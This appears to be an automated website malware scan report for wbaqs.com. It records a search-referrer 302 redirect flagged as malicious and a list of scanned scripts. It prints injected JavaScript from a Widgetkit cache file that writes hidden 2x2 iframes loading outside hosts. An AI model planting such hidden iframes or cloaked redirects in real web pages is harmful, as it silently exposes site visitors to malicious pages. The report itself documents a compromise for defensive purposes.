Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://wbaqs.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: wbaqs.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Sep 2014 01:52:26 GMT Location: http://habboigratis.altervista.org/ohmf.html?h=965857 Server: Apache Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://wbaqs.com/ | 200 OK Content-Length: 55302 Content-Type: text/html | clean |
http://wbaqs.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://wbaqs.com/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://wbaqs.com/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://wbaqs.com/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94490 Content-Type: application/javascript | clean |
http://wbaqs.com/cache/widgetkit/widgetkit-9ee3055b.js | 200 OK Content-Length: 10258 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://23bacio.com/ehzd.html?j=965857></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=965857></iframe>'); window["WIDGETKIT_URL"]="/media/widgetkit"; function wk_ajax_render_url(widgetid){return"/index.php/component/widgetkit/?tmpl=raw& $widgetkit.trans.addDic({"LESS_THAN_A_MINUTE_AGO":"less than a minute ago","ABOUT_A_MINUTE_AGO":"about a minute ago","X_MINUTES_AGO":"%s minutes ago","ABOUT_AN_HOUR_AGO":"about an hour ago","X_HOURS_AGO":"about %s hours ago","ONE_DAY_AGO":"1 day ago","X_DAYS_AGO":"%s days ago"}); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://23bacio.com/ehzd.html?j=965857 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://23bacio.com/ehzd.html?j=965857> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=965857 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=965857> | ||
http://wbaqs.com/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163628 Content-Type: application/x-javascript | clean |
http://wbaqs.com/templates/j51_oxygen/js/dropdown.js | 200 OK Content-Length: 51309 Content-Type: application/javascript | clean |
http://wbaqs.com/templates/j51_oxygen/js/equalizer.js | 200 OK Content-Length: 787 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery-1.5.2.min.js | 200 OK Content-Length: 85925 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery.animate-colors-min.js | 200 OK Content-Length: 1736 Content-Type: application/javascript | clean |
http://wbaqs.com/modules/mod_AutsonSlideShow/js/jquery.skitter.min.js | 200 OK Content-Length: 50242 Content-Type: application/javascript | clean |
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wbaqs.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wbaqs.com/
Result: wbaqs.com is not infected or malware details are not published yet.
Result: wbaqs.com is not infected or malware details are not published yet.